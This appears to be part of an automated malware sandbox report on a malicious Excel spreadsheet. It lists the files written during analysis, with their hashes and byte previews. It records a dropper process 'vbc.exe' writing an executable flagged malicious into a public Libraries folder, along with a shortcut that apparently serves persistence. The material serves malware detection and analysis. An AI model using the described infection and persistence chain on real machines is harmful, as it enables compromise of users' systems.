Encrypted:	false
SSDEEP:	192:hxKBFo46X6nPHvGePo6ylZ+c5xlYYY5spgpb75DBcld7jcnM5b:b740IylZ+c5xlYF5Sgd7tBednd
MD5:	66EF10508ED9AE9871D59F267FBE15AA
SHA1:	E40FDB09F7FDA69BD95249A76D06371A851F44A6
SHA-256:	461BABBDFFDCC6F4CD3E3C2C97B50DDAC4800B90DDBA35F1E00E16C149A006FD
SHA-512:	678656042ECF52DAE4132E3708A6916A3D040184C162DF74B78C8832133BCD3B084A7D03AC43179D71AD9513AD27F42DC788BCBEE2ACF6FF5E7FEB5C3648B305
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	.PNG........IHDR...............\|.....sRGB.........gAMA......a.....pHYs..........o.d..'oIDATx^.k...u.D.R.b\J"Y..".d.\|pq..2.r,.U.#.)F.K.n.).JI)."....T.....!.....`/H. ...\<...K...DQ"..]..(RI..>.s..t..w.>..U....>.....s/....1./^..p..........Z.H3.y..:..<..........[...@[.........Z.`E....Y:{.,.<y..x....O..................M....M........:..tx............'o..kh.0./.3.7.V...@t........x......~...A.?w....@...A]h.0./.N..^,h......D.....M..B..a}a.a.i.m...D.....M..B..a}a.a.........A]h.0.....P41..-........&.!...!.x......(.......e..a :.+.\|.Ut.U_..........2un......F7[.z.?...&..qF}.}..]I...+..J.w.~Aw....V..-.....B, W.5..P.y....>[.....q.t.6U<..@.....qE9.nT.u...`..AY.?...Z<.D.t...HT..A.....8.)..M...k\...v...`..A..?.N.Z<.D.t.Htn.O.sO...0..wF...W.#H...!p....h...\|.V+Kws2/......W....Q.,...8X.)c...M..H.\|.h.0....R...Mg!...B...x..;....Q..5........m.;.Q./9..e"{Y.P..1x...FB!....C.G.......41.........@t@W......B/.n.b...w..d....k'E..&..%l.4SBt.E?..m...eb?.....@.....a :.+H...Rh..

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2930BD79.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 458 x 211, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	11303
Entropy (8bit):	7.909402464702408
Encrypted:	false
SSDEEP:	192:O64BSHRaEbPRI3iLtF0bLLbEXavJkkTx5QpBAenGIC1bOgjBS6UUijBswpJuaUSt:ODy31IAj0bL/EKvJkVFgFg6UUijOmJJN
MD5:	9513E5EF8DDC8B0D9C23C4DFD4AEECA2
SHA1:	E7FC283A9529AA61F612EC568F836295F943C8EC
SHA-256:	88A52F8A0BDE5931DB11729D197431148EE9223B2625D8016AEF0B1A510EFF4C
SHA-512:	81D1FE0F43FE334FFF857062BAD1DFAE213EED860D5B2DD19D1D6875ACDF3FC6AB82A43E46ECB54772D31B713F07A443C54030C4856FC4842B4C31269F61346D
Malicious:	false
Preview:	.PNG........IHDR..............P.l....sRGB.........gAMA......a.....pHYs...t...t..f.x..+.IDATx...\|.e............{......z.Y8..DiE.46.@.$$....+!.T.H/..M6..RH.l.R.!AC...>3;3;..4..~...>3.<.<..7.<3..555........c...xo.Z.X.J...Lhv.u.q..C..D......-...#n...!.W..#...x.m..&.S........cG.... s..H.=......,...(((HJJR.s..05J...2m.....=..R..Gs....G.3.z..."............(..1$..)..[..c&t..ZHv..5....3#..~8....Y...............e2...?.0.t.R}ZI..`.&.......rO..U.mK..N.8..C...[..\....G.^y.U.....N.....eff.....A....Z.b.YU....M.j.vC+\.gu..0v..5...fo.....'......^w..y....O.RSS....?.."L.+c.J....ku$._...Av...Z...*Y.0.z..zMsrT.:.<.q.....a.......O.....$2.=\|.0.0..A.v..j....h..P.Nv......,.0....z=...I@8m.h.:]..B.q.C.......6...8qB......G\.."L.o..[)..Z.XuJ.pE..Q.u.:..$[K..2.....zM=`.p.Q@.o.LA../.%....EFsk:z...9.z......>z..H,.{{{...C....n..X.b....K.:..2,...C....;.4....f1,G.....p\|f6.^._.c..'''Qll..........W.[..s..q+e.:.\|..(....aY..yX....}...n.u..8d...L...:B."zuxz..^..m;p..(&&....

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\38A6D1D2.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 1295 x 471, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	68702
Entropy (8bit):	7.960564589117156
Encrypted:	false
SSDEEP:	1536:Hu2p9Cy+445sz12HnOFIr0Z7gK8mhVgSKe/6mLsw:O2p9w1HCIOTKEhQw
MD5:	9B8C6AB5CD2CC1A2622CC4BB10D745C0
SHA1:	E3C68E3F16AE0A3544720238440EDCE12DFC900E
SHA-256:	AA5A55A415946466C1D1468A6349169D03A0C157A228B4A6C1C85BFD95506FE0
SHA-512:	407F29E5F0C2F993051E4B0C81BF76899C2708A97B6DF4E84246D6A2034B6AFE40B696853742B7E38B7BBE7815FCCCC396A3764EE8B1E6CFB2F2EF399E8FC715
Malicious:	false
Preview:	.PNG........IHDR.....................pHYs..........+......tIME......&...T....tEXtAuthor....H....tEXtDescription...!#....tEXtCopyright....:....tEXtCreation time.5.......tEXtSoftware.]p.:....tEXtDisclaimer.........tEXtWarning........tEXtSource.........tEXtComment........tEXtTitle....'.. .IDATx...y\|T.?..l..3. .$.D..(v....Q.q.....W.[...Z..-.Hlmm...4V..BU..V@,h.t.....}...cr.3.......B3s.....\|.}.G6j.t.Qv..-Q9...r\"""""""".H9...Y...v...........7........Q..^t{P..C..""""""""".e..n@7B.{Q.S.HDDDDDDDD...........\bxHDDDDDDDDD.1<$""""""""......d2Y@9`@c.v..8P...0`..a\|.....<... ..+...[""""""""".....~..,........+.t..._..o.....8z.$ ..U.Mp".....Z8.a;.B..'...y..I^......e........,}.+.M..K...M...A.7.Z[[.E.....B...nF.:5.."""""""".(.....d.3*..E.=...[o...o.....n..._.{..-..M.3....px(.5..4lt..&....d.R!.......!.$''.n.....X,..__ar.d..0 .M#"""""""..S...T...Ai.8P^XX(..d.....u[.f...8........[`...q..9R../.....v.b.5.r`.[.A..a.....a6......S.o.h7...........g..v..+.~.oB.H..\|..8...

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3C8D526.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 413 x 220, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	10202
Entropy (8bit):	7.870143202588524
Encrypted:	false
SSDEEP:	192:hxKBFo46X6nPHvGePo6ylZ+c5xlYYY5spgpb75DBcld7jcnM5b:b740IylZ+c5xlYF5Sgd7tBednd
MD5:	66EF10508ED9AE9871D59F267FBE15AA
SHA1:	E40FDB09F7FDA69BD95249A76D06371A851F44A6
SHA-256:	461BABBDFFDCC6F4CD3E3C2C97B50DDAC4800B90DDBA35F1E00E16C149A006FD
SHA-512:	678656042ECF52DAE4132E3708A6916A3D040184C162DF74B78C8832133BCD3B084A7D03AC43179D71AD9513AD27F42DC788BCBEE2ACF6FF5E7FEB5C3648B305
Malicious:	false
Preview:	.PNG........IHDR...............\|.....sRGB.........gAMA......a.....pHYs..........o.d..'oIDATx^.k...u.D.R.b\J"Y..".d.\|pq..2.r,.U.#.)F.K.n.).JI)."....T.....!.....`/H. ...\<...K...DQ"..]..(RI..>.s..t..w.>..U....>.....s/....1./^..p..........Z.H3.y..:..<..........[...@[.........Z.`E....Y:{.,.<y..x....O..................M....M........:..tx............'o..kh.0./.3.7.V...@t........x......~...A.?w....@...A]h.0./.N..^,h......D.....M..B..a}a.a.i.m...D.....M..B..a}a.a.........A]h.0.....P41..-........&.!...!.x......(.......e..a :.+.\|.Ut.U_..........2un......F7[.z.?...&..qF}.}..]I...+..J.w.~Aw....V..-.....B, W.5..P.y....>[.....q.t.6U<..@.....qE9.nT.u...`..AY.?...Z<.D.t...HT..A.....8.)..M...k\...v...`..A..?.N.Z<.D.t.Htn.O.sO...0..wF...W.#H...!p....h...\|.V+Kws2/......W....Q.,...8X.)c...M..H.\|.h.0....R...Mg!...B...x..;....Q..5........m.;.Q./9..e"{Y.P..1x...FB!....C.G.......41.........@t@W......B/.n.b...w..d....k'E..&..%l.4SBt.E?..m...eb?.....@.....a :.+H...Rh..

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\42F2BF3.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 838 x 469, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	21987
Entropy (8bit):	7.952828365949915
Encrypted:	false
SSDEEP:	384:MoaqtIZxNY3dMzKeijXyso4gYhVZAUrE68p/DazS396RFnDUhkhiedxQ9:AqtIZzYNM+HjXyjOhVZW68pPWGedO9
MD5:	5A25F525D9F0D658AF52A4F78FE031D4
SHA1:	525FB63F75E745FBC90E4E42E624E030C5DF94EB
SHA-256:	D791841D657B6D2A9E5ED1B7F8548B1044A2C7EC62D05846C72D8556DB9E9BC8
SHA-512:	FE2F2D9744CE7235F4DBC36861249372C42B85920B6A1C75A8B2C330BD07F7C4C12A5DF5CA9AAED4C2BCDAD9D196DFF3A34732EE296FE6F006A16ACC41F5EEC3
Malicious:	false
Preview:	.PNG........IHDR...F................PLTE...0.....T[c..........................f..................9.....d.........k9u....b...........9....f..kr............t.......e.......9....]X........./.;9.................h..........d.<...({...........t_.....................c7..Ga.06?....._..V.....T..............9......e......ee...........f......:;.D."...h..............e...............Q....E.......l..~..t"....D.............................:....9...........T.........^..d9;....iv...09.Z...........................................................................$...ee9h.G..........................................~........................................;<.........`....................99....5..............................................................AL...R.IDATx...`..&.H......-@.n..]A... ..Fn.!`$X..&&..X@$c..dl<.#...PD....$&".1..h.N..Y3..L6.d.$.XFw..;&(a....=.:..Z].].Q....S..;.?...W%.D....1..s.!....4....`{U'.QU........~.e.*....

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4CA30D58.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 1295 x 471, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	68702
Entropy (8bit):	7.960564589117156
Encrypted:	false
SSDEEP:	1536:Hu2p9Cy+445sz12HnOFIr0Z7gK8mhVgSKe/6mLsw:O2p9w1HCIOTKEhQw
MD5:	9B8C6AB5CD2CC1A2622CC4BB10D745C0
SHA1:	E3C68E3F16AE0A3544720238440EDCE12DFC900E
SHA-256:	AA5A55A415946466C1D1468A6349169D03A0C157A228B4A6C1C85BFD95506FE0
SHA-512:	407F29E5F0C2F993051E4B0C81BF76899C2708A97B6DF4E84246D6A2034B6AFE40B696853742B7E38B7BBE7815FCCCC396A3764EE8B1E6CFB2F2EF399E8FC715
Malicious:	false
Preview:	.PNG........IHDR.....................pHYs..........+......tIME......&...T....tEXtAuthor....H....tEXtDescription...!#....tEXtCopyright....:....tEXtCreation time.5.......tEXtSoftware.]p.:....tEXtDisclaimer.........tEXtWarning........tEXtSource.........tEXtComment........tEXtTitle....'.. .IDATx...y\|T.?..l..3. .$.D..(v....Q.q.....W.[...Z..-.Hlmm...4V..BU..V@,h.t.....}...cr.3.......B3s.....\|.}.G6j.t.Qv..-Q9...r\"""""""".H9...Y...v...........7........Q..^t{P..C..""""""""".e..n@7B.{Q.S.HDDDDDDDD...........\bxHDDDDDDDDD.1<$""""""""......d2Y@9`@c.v..8P...0`..a\|.....<... ..+...[""""""""".....~..,........+.t..._..o.....8z.$ ..U.Mp".....Z8.a;.B..'...y..I^......e........,}.+.M..K...M...A.7.Z[[.E.....B...nF.:5.."""""""".(.....d.3*..E.=...[o...o.....n..._.{..-..M.3....px(.5..4lt..&....d.R!.......!.$''.n.....X,..__ar.d..0 .M#"""""""..S...T...Ai.8P^XX(..d.....u[.f...8........[`...q..9R../.....v.b.5.r`.[.A..a.....a6......S.o.h7...........g..v..+.~.oB.H..\|..8...

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6D5F6EF.jpeg Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 150x150, segment length 16, baseline, precision 8, 1275x1650, frames 3
Category:	dropped
Size (bytes):	85020
Entropy (8bit):	7.2472785111025875
Encrypted:	false
SSDEEP:	768:RgnqDYqspFlysF6bCd+ksds0cdAgfpS56wmdhcsp0Pxm00JkxuacpxoOlwEF3hVL:RUqQGsF6OdxW6JmPncpxoOthOip
MD5:	738BDB90A9D8929A5FB2D06775F3336F
SHA1:	6A92C54218BFBEF83371E825D6B68D4F896C0DCE
SHA-256:	8A2DB44BA9111358AFE9D111DBB4FC726BA006BFA3943C1EEBDA5A13F87DDAAB
SHA-512:	48FB23938E05198A2FE136F5E337A5E5C2D05097AE82AB943EE16BEB23348A81DA55AA030CB4ABCC6129F6EED8EFC176FECF0BEF4EC4EE6C342FC76CCDA4E8D6
Malicious:	false
Preview:	......JFIF.............C....................................................................C.......................................................................r...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.....(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B697C424.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 737 x 456, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	83904
Entropy (8bit):	7.986000888791215
Encrypted:	false
SSDEEP:	1536:xNzYthYR7Iu3TjzBH8lXtvmNy2k8KYpNNNQ64nBLEMoknbRVmnN6:xNzUGxDjeOs2kSNSBh24
MD5:	9F9A7311810407794A153B7C74AED720
SHA1:	EDEE8AE29407870DB468F9B23D8C171FBB0AE41C
SHA-256:	000586368A635172F65B169B41B993F69B5C3181372862258DFAD6F9449F16CD
SHA-512:	27FC1C21B8CB81607E28A55A32ED895DF16943E9D044C80BEC96C90D6D805999D4E2E5D4EFDE2AA06DB0F46805900B4F75DFC69B58614143EBF27908B79DDA42
Malicious:	false
Preview:	.PNG........IHDR.............oi......IDATx..u\|........@ .@..[.H.5...<....R.8.P...b-....[.!...M..1{on.MB.@...{........r..9s.QTUE".H$..$.a._.@".H$..$...".H$..$;"e..D".H$..).H$..D".H.E".H$.IvD.(..D".H.#RF.H$..D...2.D".H$..Q$..D".dG..".H$..$;"e..D".H$..).H$..D".H.E".H$.IvD.(..D".H.#RF.H$..D...... y.P....D".H..TU}..RF..jRRR...A.1y..Eyj..d$Ne.U..x..f...,.3.......^.m.ga<r...Q..Y..&....43\|A...~...b...l..&........d../C..... ...sN....;.IFXX<..F.z$..D".dG..E..1.fR.%..= 6((W..5.m....YsM.!.....v..r.....\Y..h.N.M.v....{.%...........gb&.<..7/..).X..(\.......0k......k.d2..KI;...O.X..]j.G..BB(U..........`.zU@=t$...S........N...6..a`..t...z.v:.....M......YUe.N....TI...]NQ.<..vm....o....\|yt:......P..d.]....bE.zr.....UJ.y.b....5...gg..?..;pr..V-..U.66.h...Y.......q_t:.."M..x.7...4Y...aa.@qw.I..=.sgC.....pa.!O.Q.....%.f..P..~.uk...8.......-R....5m.I..S.BCC....9r...O.<8u....Q$..E!).`.6.7V.k+WF^...y...p......5.......\)~Y.7m....../.P._^.0W@.....[....<.R..

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\BA1488DD.emf Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Windows Enhanced Metafile (EMF) image data version 0x10000
Category:	dropped
Size (bytes):	498420
Entropy (8bit):	0.6411729750186352
Encrypted:	false
SSDEEP:	384:KXXwBkNWZ3cJuUvmWnTG+W4DH8ddxzsFfW3:sXwBkNWZ3cjvmWa+VDO
MD5:	E34E1237F085DEB7E5C5B938C6C659B2
SHA1:	AEA96141A3412AFB7E145F49944BE893CA3FB164
SHA-256:	CE27BA7228F10D6C4C087926A2C74D644921CBFD3F9843F4FADD4C71073F1AC6
SHA-512:	677DD541ADC14DE4EAC107A2D7242930B47CA79F7F25832D02B0FB14B7665F62CF3F3884CA75672F594C7EFA9729DBED364947C1783D9CFCC5025C4690C2E8F3
Malicious:	false
Preview:	....l...............2...........m>..C... EMF........&...............................................\K..hC..F...,... ...EMF+.@..................X...X...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@......................................................%...........%...................................R...p................................@."C.a.l.i.b.r.i.....................................................nZ$...../..fxZ.@-.%...../.(./......./.../.RQ.[../.../......./.p./.$Q.[../.../. ...IdxZ../.../. ............dxZ............O...........................%...X...%...7...................{$..................C.a.l.i.b.r.i............./.X...../.../..8pZ........dv......%...........%...........%...........!..............................."...........%...........%...........%...........T...T..........................@.E.@....2.......L.......................P... ...6...F....F...F..EMF+@..$..........?...........?.........@...........@..........@..$..........?....

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D59453AB.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 458 x 211, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	11303
Entropy (8bit):	7.909402464702408
Encrypted:	false
SSDEEP:	192:O64BSHRaEbPRI3iLtF0bLLbEXavJkkTx5QpBAenGIC1bOgjBS6UUijBswpJuaUSt:ODy31IAj0bL/EKvJkVFgFg6UUijOmJJN
MD5:	9513E5EF8DDC8B0D9C23C4DFD4AEECA2
SHA1:	E7FC283A9529AA61F612EC568F836295F943C8EC
SHA-256:	88A52F8A0BDE5931DB11729D197431148EE9223B2625D8016AEF0B1A510EFF4C
SHA-512:	81D1FE0F43FE334FFF857062BAD1DFAE213EED860D5B2DD19D1D6875ACDF3FC6AB82A43E46ECB54772D31B713F07A443C54030C4856FC4842B4C31269F61346D
Malicious:	false
Preview:	.PNG........IHDR..............P.l....sRGB.........gAMA......a.....pHYs...t...t..f.x..+.IDATx...\|.e............{......z.Y8..DiE.46.@.$$....+!.T.H/..M6..RH.l.R.!AC...>3;3;..4..~...>3.<.<..7.<3..555........c...xo.Z.X.J...Lhv.u.q..C..D......-...#n...!.W..#...x.m..&.S........cG.... s..H.=......,...(((HJJR.s..05J...2m.....=..R..Gs....G.3.z..."............(..1$..)..[..c&t..ZHv..5....3#..~8....Y...............e2...?.0.t.R}ZI..`.&.......rO..U.mK..N.8..C...[..\....G.^y.U.....N.....eff.....A....Z.b.YU....M.j.vC+\.gu..0v..5...fo.....'......^w..y....O.RSS....?.."L.+c.J....ku$._...Av...Z...*Y.0.z..zMsrT.:.<.q.....a.......O.....$2.=\|.0.0..A.v..j....h..P.Nv......,.0....z=...I@8m.h.:]..B.q.C.......6...8qB......G\.."L.o..[)..Z.XuJ.pE..Q.u.:..$[K..2.....zM=`.p.Q@.o.LA../.%....EFsk:z...9.z......>z..H,.{{{...C....n..X.b....K.:..2,...C....;.4....f1,G.....p\|f6.^._.c..'''Qll..........W.[..s..q+e.:.\|..(....aY..yX....}...n.u..8d...L...:B."zuxz..^..m;p..(&&....

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E55F4DD5.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 838 x 469, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	21987
Entropy (8bit):	7.952828365949915
Encrypted:	false
SSDEEP:	384:MoaqtIZxNY3dMzKeijXyso4gYhVZAUrE68p/DazS396RFnDUhkhiedxQ9:AqtIZzYNM+HjXyjOhVZW68pPWGedO9
MD5:	5A25F525D9F0D658AF52A4F78FE031D4
SHA1:	525FB63F75E745FBC90E4E42E624E030C5DF94EB
SHA-256:	D791841D657B6D2A9E5ED1B7F8548B1044A2C7EC62D05846C72D8556DB9E9BC8
SHA-512:	FE2F2D9744CE7235F4DBC36861249372C42B85920B6A1C75A8B2C330BD07F7C4C12A5DF5CA9AAED4C2BCDAD9D196DFF3A34732EE296FE6F006A16ACC41F5EEC3
Malicious:	false
Preview:	.PNG........IHDR...F................PLTE...0.....T[c..........................f..................9.....d.........k9u....b...........9....f..kr............t.......e.......9....]X........./.;9.................h..........d.<...({...........t_.....................c7..Ga.06?....._..V.....T..............9......e......ee...........f......:;.D."...h..............e...............Q....E.......l..~..t"....D.............................:....9...........T.........^..d9;....iv...09.Z...........................................................................$...ee9h.G..........................................~........................................;<.........`....................99....5..............................................................AL...R.IDATx...`..&.H......-@.n..]A... ..Fn.!`$X..&&..X@$c..dl<.#...PD....$&".1..h.N..Y3..L6.d.$.XFw..;&(a....=.:..Z].].Q....S..;.?...W%.D....1..s.!....4....`{U'.QU........~.e.*....

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F77E15F1.jpeg Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 150x150, segment length 16, baseline, precision 8, 1275x1650, frames 3
Category:	dropped
Size (bytes):	85020
Entropy (8bit):	7.2472785111025875
Encrypted:	false
SSDEEP:	768:RgnqDYqspFlysF6bCd+ksds0cdAgfpS56wmdhcsp0Pxm00JkxuacpxoOlwEF3hVL:RUqQGsF6OdxW6JmPncpxoOthOip
MD5:	738BDB90A9D8929A5FB2D06775F3336F
SHA1:	6A92C54218BFBEF83371E825D6B68D4F896C0DCE
SHA-256:	8A2DB44BA9111358AFE9D111DBB4FC726BA006BFA3943C1EEBDA5A13F87DDAAB
SHA-512:	48FB23938E05198A2FE136F5E337A5E5C2D05097AE82AB943EE16BEB23348A81DA55AA030CB4ABCC6129F6EED8EFC176FECF0BEF4EC4EE6C342FC76CCDA4E8D6
Malicious:	false
Preview:	......JFIF.............C....................................................................C.......................................................................r...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.....(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\FF28013A.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 737 x 456, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	83904
Entropy (8bit):	7.986000888791215
Encrypted:	false
SSDEEP:	1536:xNzYthYR7Iu3TjzBH8lXtvmNy2k8KYpNNNQ64nBLEMoknbRVmnN6:xNzUGxDjeOs2kSNSBh24
MD5:	9F9A7311810407794A153B7C74AED720
SHA1:	EDEE8AE29407870DB468F9B23D8C171FBB0AE41C
SHA-256:	000586368A635172F65B169B41B993F69B5C3181372862258DFAD6F9449F16CD
SHA-512:	27FC1C21B8CB81607E28A55A32ED895DF16943E9D044C80BEC96C90D6D805999D4E2E5D4EFDE2AA06DB0F46805900B4F75DFC69B58614143EBF27908B79DDA42
Malicious:	false
Preview:	.PNG........IHDR.............oi......IDATx..u\|........@ .@..[.H.5...<....R.8.P...b-....[.!...M..1{on.MB.@...{........r..9s.QTUE".H$..$.a._.@".H$..$...".H$..$;"e..D".H$..).H$..D".H.E".H$.IvD.(..D".H.#RF.H$..D...2.D".H$..Q$..D".dG..".H$..$;"e..D".H$..).H$..D".H.E".H$.IvD.(..D".H.#RF.H$..D...... y.P....D".H..TU}..RF..jRRR...A.1y..Eyj..d$Ne.U..x..f...,.3.......^.m.ga<r...Q..Y..&....43\|A...~...b...l..&........d../C..... ...sN....;.IFXX<..F.z$..D".dG..E..1.fR.%..= 6((W..5.m....YsM.!.....v..r.....\Y..h.N.M.v....{.%...........gb&.<..7/..).X..(\.......0k......k.d2..KI;...O.X..]j.G..BB(U..........`.zU@=t$...S........N...6..a`..t...z.v:.....M......YUe.N....TI...]NQ.<..vm....o....\|yt:......P..d.]....bE.zr.....UJ.y.b....5...gg..?..;pr..V-..U.66.h...Y.......q_t:.."M..x.7...4Y...aa.@qw.I..=.sgC.....pa.!O.Q.....%.f..P..~.uk...8.......-R....5m.I..S.BCC....9r...O.<8u....Q$..E!).`.6.7V.k+WF^...y...p......5.......\)~Y.7m....../.P._^.0W@.....[....<.R..

C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\KZ513KEB.txt Download File
Process:	C:\Users\Public\vbc.exe
File Type:	ASCII text
Category:	downloaded
Size (bytes):	63
Entropy (8bit):	4.0467575593287775
Encrypted:	false
SSDEEP:	3:vpqMLJUQ2Vxlx2EPHUYfvMTe:vEMWXVfxxPUsvMTe
MD5:	6D7988E636E80D4FFABE1D866AB3BDF2
SHA1:	CDB275A3662EF35B1C67B943AF4F893DD02BD9EC
SHA-256:	8AB16B651DB65729715FA67C72DBC1246B5977949628B9CB86AAB7B6AD96D8E8
SHA-512:	5C7AD1D306631945FFEA2677CBA9F3A3120E5F9F1DC79E7AF8FFB1AFD8A33FC5FEB91F08196F29705EB38106EEFF09155F2F133A9F7F5C336064AA04B3EFC4BB
Malicious:	false
IE Cache URL:	live.com/
Preview:	wla42..live.com/.1536.375019136.30918084.4169104966.30916751.*.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\ZI4B61S9.txt Download File
Process:	C:\Users\Public\vbc.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	63
Entropy (8bit):	4.023713852754437
Encrypted:	false
SSDEEP:	3:vpqMLJUQ2XaS2EPrZ84lTe:vEMWXX5xjVlTe
MD5:	5729B36FD27014124F593B32CF5EFCE9
SHA1:	297A777F996A254F93931AD3B061E83809ED17A5
SHA-256:	329B0562784F8FB7C67C0B116C15C73DCD837AD78EAE005A34F077681184A91A
SHA-512:	4B948139C3F33E81CAE06AE24490A318495013FAC34DDCF9F78C5F6763555F78317DEDE2B2F7960198422D1D273935599F287F7CA23E8D481397EEC8A65F459C
Malicious:	false
Preview:	wla42..live.com/.1536.355019136.30918084.4143604054.30916751.*.

C:\Users\user\Desktop\~$Swift.xlsx Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	165
Entropy (8bit):	1.4377382811115937
Encrypted:	false
SSDEEP:	3:vZ/FFDJw2fV:vBFFGS
MD5:	797869BB881CFBCDAC2064F92B26E46F
SHA1:	61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
SHA-256:	D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
SHA-512:	1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
Malicious:	false
Preview:	.user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exe Download File
Process:	C:\Users\Public\vbc.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1014784
Entropy (8bit):	6.809458920712055
Encrypted:	false
SSDEEP:	12288:GrHeuodar6Dd3m4aS9FCZXhGiX1d0uVrLGaDOdJ4NUTj94rv4lprmi:GDe0W1m4aVNTc9jOij2rqpm
MD5:	A65B1815177EF9EBA7E5E894BBF65A3C
SHA1:	5459ECF044E62BFB53220D0E78A5B98C24F17E25
SHA-256:	298D542746DFA4922DD5FBC8FAB572BE58447C9DBD1481C55BD2254BB275684F
SHA-512:	0F05D5E05D51FBE5289330CA2C5486C49369728005C6D19B548D3F419FBF52F25AA50007271B315636AEDB311A43485989E4F6DE8154869D0AC7AFFB0F0E3DB1
Malicious:	true
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*............................,.............@..............................................@..............................`'........................... ......................................................................................CODE................................ ..`DATA....d...........................@...BSS......................................idata..`'.......(..................@....tls....@................................rdata..............................@..P.reloc....... ......................@..P.rsrc...............................@..P.....................\|..............@..P........................................................................................................................................

C:\Users\Public\Libraries\hpvdsxZ.url Download File
Process:	C:\Users\Public\vbc.exe
File Type:	MS Windows 95 Internet shortcut text (URL=<file:"C:\\Users\\Public\\Libraries\\Zxsdvph\\Zxsdvph.exe">), ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	96
Entropy (8bit):	4.866547012067739
Encrypted:	false
SSDEEP:	3:HRAbABGQYmTWAX+rSF55i0XMxWlVt/dWlViASsGKd6ov:HRYFVmTWDyz+8uPiASsbDv
MD5:	C115406F74CA774E3B1F5F2037D15E84
SHA1:	8109B72A1B04D79574D5A7BA652A813A390AE637
SHA-256:	B012DBEB68164BD92020760E7D57A5B21B0D73255005BBE708A19C201D3C9F1C
